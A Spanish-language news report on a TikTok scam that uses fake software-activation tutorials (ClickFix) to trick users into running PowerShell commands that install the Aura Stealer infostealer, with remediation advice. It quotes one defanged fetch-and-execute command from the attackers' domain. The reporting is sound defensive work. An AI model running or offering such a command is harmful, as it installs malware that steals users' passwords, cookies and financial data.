Cada vez más usuarios caen en videos de TikTok que prometen trucos gratuitos o activaciones de programas, pero esconden una peligrosa estafa que roba contraseñas, cookies y hasta información bancaria.

Una nueva estafa en TikTok pone en riesgo la seguridad digital de miles de usuarios mediante falsos tutoriales que aparentan enseñar cómo obtener acceso gratuito a servicios como Windows, Netflix o Photoshop, pero en realidad distribuyen malware para robar datos personales.

El fraude se basa en una técnica de ingeniería social conocida como ClickFix, que ofrece soluciones aparentemente sencillas a problemas técnicos comunes. Los videos instructivos piden ejecutar comandos en PowerShell, la terminal de Windows, que conectan el dispositivo del usuario con servidores remotos controlados por ciberdelincuentes.

Uno de los ejemplos más virales promete activar Photoshop gratis con el comando:
iex (irm slmgr[.]win/photoshop)
Sin embargo, este código descarga y ejecuta scripts maliciosos capaces de instalar archivos ejecutables diseñados para el robo de información.

Según el investigador Xavier Mertens, del SANS Internet Storm Center, uno de los archivos es una variante del conocido Aura Stealer, que roba contraseñas, cookies y datos de criptomonedas. El segundo archivo permite compilar código dinámicamente, lo que facilita ataques personalizados o persistentes.

Los expertos recomiendan actuar de inmediato si se ha caído en la estafa:

Cambiar todas las contraseñas.

Ejecutar un análisis con antivirus actualizado.

Desconectar el dispositivo si se detecta actividad sospechosa.

Revisar procesos y servicios del sistema.


También se sugiere reportar los videos y cuentas involucradas a TikTok para evitar que más usuarios sean víctimas.